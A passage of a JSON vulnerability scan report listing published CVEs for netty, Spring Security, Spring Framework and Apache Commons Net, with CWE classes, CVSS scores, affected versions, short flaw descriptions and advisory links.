cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N","version":"3.1"},"products":["io.netty/netty-codec-http@vers:maven/>=4.0.0|<4.1.71.Final"]}],"title":"CVE-2021-43797/pkg:maven/io.netty/netty-codec-http@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37137"]}],"cve":"CVE-2021-37137","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2021-09-09T17:11:31","ids":[{"system_name":"CVE Record","text":"CVE-2021-37137"},{"system_name":"GitHub Advisory","text":"GHSA-9vjp-v76f-g363"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0012"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"\\tSnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way"},{"category":"details","details":"Vulnerability Details","text":"# SnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way ### Impact The Snappy frame decoder 
function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. ### Impact All users of SnappyFrameDecoder are affected and so the application may be in risk for a DoS attach due excessive memory usage. ### References https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185"}],"product_status":{"known_affected":["io.netty/netty-codec@vers:maven/>=4.0.0|<4.1.68.Final"],"known_not_affected":["io.netty/netty-codec@4.1.68.Final"]},"references":[{"summary":"GitHub Advisory GHSA-9vjp-v76f-g363","url":"https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37137"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37137"},{"summary":"NetApp Advisory ntap-20220210-0012","url":"https://security.netapp.com/advisory/ntap-20220210-0012"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-codec@vers:maven/>=4.0.0|<4.1.68.Final"]}],"title":"CVE-2021-37137/pkg:maven/io.netty/netty-codec@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37136"]}],"cve":"CVE-2021-37136","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2021-09-09T17:11:21","ids":[{"system_name":"CVE Record","text":"CVE-2021-37136"},{"system_name":"GitHub Advisory","text":"GHSA-grg4-wf29-r9vv"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0012"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bzip2Decoder doesn't allow setting size restrictions for decompressed data"},{"category":"details","details":"Vulnerability Details","text":"# Bzip2Decoder doesn't allow setting size restrictions for decompressed data ### Impact The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data 
(which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack ### Workarounds No workarounds other than not using the `Bzip2Decoder` ### References Relevant code areas: https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305"}],"product_status":{"known_affected":["io.netty/netty-codec@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]},"references":[{"summary":"GitHub Advisory GHSA-grg4-wf29-r9vv","url":"https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E"},{"summary":"Debian Mailing 
List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37136"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37136"},{"summary":"NetApp Advisory ntap-20220210-0012","url":"https://security.netapp.com/advisory/ntap-20220210-0012"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-codec@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]}],"title":"CVE-2021-37136/pkg:maven/io.netty/netty-codec@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-34462"]}],"cve":"CVE-2023-34462","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-06-20T16:33:22","ids":[{"system_name":"CVE Record","text":"CVE-2023-34462"},{"system_name":"GitHub 
Advisory","text":"GHSA-6mjq-h674-j845"},{"system_name":"Debian Advisory","text":"dsa-5558"},{"system_name":"NetApp Advisory","text":"ntap-20230803-0001"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0007"}],"notes":[{"audience":"developers","category":"other","text":"Allocation of Resources Without Limits or Throttling","title":"Additional CWE: 770"},{"category":"description","details":"Vulnerability Description","text":"netty-handler SniHandler 16MB allocation"},{"category":"details","details":"Vulnerability Details","text":"# netty-handler SniHandler 16MB allocation ### Summary The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. ### Details The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler` 1/ allocate a 16MB `ByteBuf` 2/ not fail `decode` method `in` buffer 3/ get out of the loop without an exception The combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection. ### Impact If the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. 
This could lead to a OutOfMemoryError and so result in a DDOS."}],"product_status":{"known_affected":["io.netty/netty-handler@vers:maven/>=4.0.0.Alpha1|<=4.1.93.Final"]},"references":[{"summary":"GitHub Advisory GHSA-6mjq-h674-j845","url":"https://github.com/netty/netty/security/advisories/GHSA-6mjq-h674-j845"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34462"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34462"},{"summary":"NetApp Advisory ntap-20230803-0001","url":"https://security.netapp.com/advisory/ntap-20230803-0001"},{"summary":"NetApp Advisory ntap-20240621-0007","url":"https://security.netapp.com/advisory/ntap-20240621-0007"},{"summary":"Debian Advisory dsa-5558","url":"https://www.debian.org/security/2023/dsa-5558"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-handler@vers:maven/>=4.0.0.Alpha1|<=4.1.93.Final"]}],"title":"CVE-2023-34462/pkg:maven/io.netty/netty-handler@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22112"]}],"cve":"CVE-2021-22112","cwe":{"id":"269","name":"Improper Privilege Management"},"discovery_date":"2021-05-10T15:22:39","ids":[{"system_name":"CVE Record","text":"CVE-2021-22112"},{"system_name":"Oracle 
Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Vmware Advisory","text":"cve-2021-22112"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Privilege escalation in spring security"},{"category":"details","details":"Vulnerability Details","text":"# Privilege escalation in spring security Spring Security 5.4.x prior to 5.4.4, 5.3.x prior to 5.3.8.RELEASE, 5.2.x prior to 5.2.9.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug can be leveraged to extend those privileges to the rest of the application."}],"product_status":{"known_affected":["org.springframework.security/spring-security-web@vers:maven/>=3.0.0.RELEASE|<=5.2.8.RELEASE"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/02/19/7"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r163b3e4e39803882f5be05ee8606b2b9812920e196daa2a82997ce14@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2cb05e499807900ba23e539643eead9c5f0652fd271f223f89da1804@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r37423ec7eea340e92a409452c35b649dce02fdc467f0b3f52086c177@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3868207b967f926819fe3aa8d33f1666429be589bb4a62104a49f4e3@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r390783b3b1c59b978131ac08390bf77fbb3863270cbde59d5b0f5fde@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r413e380088c427f56102968df89ef2f336473e1b56b7d4b3a571a378@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r89aa1b48a827f5641310305214547f1d6b2101971a49b624737c497f@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra53677224fe4f04c2599abc88032076faa18dc84b329cdeba85d4cfc@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra6389b1b82108a3b6bbcd22979f7665fd437c2a3408c9509a15a9ca1@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/redbd004a503b3520ae5746c2ab5e93fd7da807a8c128e60d2002cd9b@%3Cissues.nifi.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22112"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22112"},{"summary":"Vmware Advisory cve-2021-22112","url":"https://tanzu.vmware.com/security/cve-2021-22112"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.security/spring-security-web@vers:maven/>=3.0.0.RELEASE|<=5.2.8.RELEASE"]}],"title":"CVE-2021-22112/pkg:maven/org.springframework.security/spring-security-web@4.2.12.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-5408"]}],"cve":"CVE-2020-5408","cwe":{"id":"329","name":"Generation of Predictable IV with CBC Mode"},"discovery_date":"2020-06-15T19:34:31","ids":[{"system_name":"CVE Record","text":"CVE-2020-5408"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Vmware Advisory","text":"cve-2020-5408"}],"notes":[{"audience":"developers","category":"other","text":"Use of Insufficiently Random Values","title":"Additional CWE: 330"},{"category":"description","details":"Vulnerability Description","text":"Insufficient Entropy in Spring Security"},{"category":"details","details":"Vulnerability Details","text":"# Insufficient Entropy in Spring Security Spring Security versions 5.3.x prior to 5.3.2, 5.2.x prior to 5.2.4, 5.1.x prior to 5.1.10, 5.0.x prior to 5.0.16 and 4.2.x 
prior to 4.2.16 use a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack."}],"product_status":{"known_affected":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=4.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5408"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5408"},{"summary":"Vmware Advisory cve-2020-5408","url":"https://tanzu.vmware.com/security/cve-2020-5408"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=4.2.9.RELEASE"]}],"title":"CVE-2020-5408/pkg:maven/org.springframework.security/spring-security-core@4.2.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.
vmware.com/security/cve-2022-22978"]}],"cve":"CVE-2022-22978","cwe":{"id":"285","name":"Improper Authorization"},"discovery_date":"2022-05-20T00:00:39","ids":[{"system_name":"CVE Record","text":"CVE-2022-22978"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22978"},{"system_name":"NetApp Advisory","text":"ntap-20220707-0003"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Authorization","title":"Additional CWE: 863"},{"category":"description","details":"Vulnerability Description","text":"Authorization bypass in Spring Security"},{"category":"details","details":"Vulnerability Details","text":"# Authorization bypass in Spring Security In Spring Security versions 5.5.6 and 5.5.7 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass."}],"product_status":{"known_affected":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=5.4.9"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22978"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22978"},{"summary":"NetApp Advisory ntap-20220707-0003","url":"https://security.netapp.com/advisory/ntap-20220707-0003"},{"summary":"Cve 2022","url":"https://spring.io/security/cve-2022-22978"},{"summary":"Vmware Advisory cve-2022-22978","url":"https://tanzu.vmware.com/security/cve-2022-22978"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=5.4.9"]}],"title":"CVE-2022-22978/pkg:maven/org.springframework.security/spring-security-core@4.2.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-22970"]}],"cve":"CVE-2022-22970","cwe":{"id":"770","name":"Allocation of Resources Without Limits or Throttling"},"discovery_date":"2022-05-13T00:00:28","ids":[{"system_name":"CVE Record","text":"CVE-2022-22970"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22970"},{"system_name":"NetApp Advisory","text":"ntap-20220616-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Denial of service in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Denial of service in Spring Framework In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model 
object."}],"product_status":{"known_affected":["org.springframework/spring-beans@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22970"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22970"},{"summary":"NetApp Advisory ntap-20220616-0006","url":"https://security.netapp.com/advisory/ntap-20220616-0006"},{"summary":"Vmware Advisory cve-2022-22970","url":"https://tanzu.vmware.com/security/cve-2022-22970"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-beans@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22970/pkg:maven/org.springframework/spring-beans@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-22968"]}],"cve":"CVE-2022-22968","cwe":{"id":"178","name":"Improper Handling of Case Sensitivity"},"discovery_date":"2022-04-15T00:00:32","ids":[{"system_name":"CVE Record","text":"CVE-2022-22968"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22968"},{"system_name":"NetApp 
Advisory","text":"ntap-20220602-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper handling of case sensitivity in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Improper handling of case sensitivity in Spring Framework In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. Versions 5.3.19 and 5.2.21 contain a patch for this issue."}],"product_status":{"known_affected":["org.springframework/spring-context@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22968"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22968"},{"summary":"NetApp Advisory ntap-20220602-0004","url":"https://security.netapp.com/advisory/ntap-20220602-0004"},{"summary":"Vmware Advisory cve-2022-22968","url":"https://tanzu.vmware.com/security/cve-2022-22968"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.springframework/spring-context@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22968/pkg:maven/org.springframework/spring-context@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37533"]}],"cve":"CVE-2021-37533","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-12-03T15:30:26","ids":[{"system_name":"CVE Record","text":"CVE-2021-37533"},{"system_name":"Apache Advisory","text":"NET-711"},{"system_name":"Debian Advisory","text":"dsa-5307"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Commons Net vulnerable to information leakage via malicious server"},{"category":"details","details":"Vulnerability Details","text":"# Apache Commons Net vulnerable to information leakage via malicious server Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. 
